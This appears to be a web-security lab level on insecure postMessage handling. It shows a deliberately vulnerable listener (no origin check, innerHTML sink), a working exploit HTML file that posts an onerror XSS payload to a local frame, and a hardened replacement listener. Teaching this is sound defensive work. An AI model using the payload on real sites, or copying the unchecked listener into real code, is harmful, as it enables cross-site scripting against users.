Level 4: Insecure postMessage
MISSION: This frame listens for cross-origin messages. You need to write an exploit locally (e.g. an HTML file on your desktop) that iframes this URL and sends it a malicious message.
/// SOURCE CODE INSPECTOR ///
// Client-Side Event Listener
window.addEventListener('message', function(e) {
  // FLAW 1: e.origin is never checked, so a page on any origin (including a
  // file:// page, whose origin is the string 'null') can send this message.
  if (e.data && e.data.type === 'updateText') {
    // FLAW 2: attacker-controlled e.data.html is parsed as markup by innerHTML,
    // so any message that passes the type check is a DOM XSS sink.
    document.getElementById('msg-box').innerHTML = e.data.html;
  }
});
/// DECRYPTION COMPLETE ///
The listener accepts messages from any origin (e.origin is never compared against anything) and assigns the attacker-supplied html property straight to innerHTML, so any page that can obtain a window reference to this frame gets DOM-based XSS inside it. A page opened from disk has the origin string 'null'; the exploit works only because the listener never looks at it, and a correct listener would reject that origin. To exploit it, create a local HTML file, open it in your browser, and have it embed this level in an iframe and post the message to that frame.
Exploit HTML File:
<iframe src="http://localhost:3000/level4" id="target"></iframe>
<script>
  // Post once the level has finished loading; a fixed setTimeout can fire
  // before the listener is registered and the message is silently lost.
  document.getElementById('target').addEventListener('load', function () {
    document.getElementById('target').contentWindow.postMessage(
      { type: 'updateText', html: '<img src=x onerror=alert(1)>' },
      '*' // targetOrigin '*' is acceptable here: the message carries nothing secret
    );
  });
</script>
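For contrast, the following is a hardened version of the listener, added here as an example and not part of the challenge's own code. It assumes https://trusted.example is the only origin allowed to drive the box (a placeholder value) and that the message carries a plain text field instead of html; the validation is kept separate from the DOM wiring so it can be exercised without a browser.

```javascript
// Added example: hardened replacement for the Level 4 message listener.
// Not the challenge's code. ALLOWED_ORIGIN is an assumed placeholder.
const ALLOWED_ORIGIN = 'https://trusted.example';

// Decide whether a message event may be acted on. Pure function: `event`
// only needs `origin` and `data`, so it runs under Node as well as a browser.
function validateMessage(event, allowedOrigin = ALLOWED_ORIGIN) {
  // Fix for FLAW 1: exact string comparison of the origin. Do not use
  // startsWith/includes (https://trusted.example.attacker.net would pass)
  // and never whitelist 'null', the origin of file:// pages and sandboxed frames.
  if (typeof event.origin !== 'string' || event.origin !== allowedOrigin) {
    return { ok: false, reason: 'untrusted origin' };
  }
  const data = event.data;
  if (!data || typeof data !== 'object' || data.type !== 'updateText') {
    return { ok: false, reason: 'unexpected message type' };
  }
  // Fix for FLAW 2: only accept a plain string, to be rendered as text.
  if (typeof data.text !== 'string') {
    return { ok: false, reason: 'text must be a string' };
  }
  return { ok: true, text: data.text };
}

// Build the listener. `box` is any object with a `textContent` property:
// a real element in the browser, a plain object under test.
function makeSecureListener(box, allowedOrigin = ALLOWED_ORIGIN) {
  return function onMessage(event) {
    const verdict = validateMessage(event, allowedOrigin);
    if (!verdict.ok) return verdict;
    // textContent, not innerHTML: markup in the payload is shown literally.
    box.textContent = verdict.text;
    return verdict;
  };
}

// Browser wiring; skipped under Node, where there is no window/document.
if (typeof window !== 'undefined' && typeof document !== 'undefined') {
  window.addEventListener(
    'message',
    makeSecureListener(document.getElementById('msg-box'))
  );
}
```

With this listener the Level 4 exploit fails twice over: a file:// sender arrives with origin 'null' and is dropped before the payload is inspected, and even a message from the trusted origin cannot inject markup because the box is written through textContent.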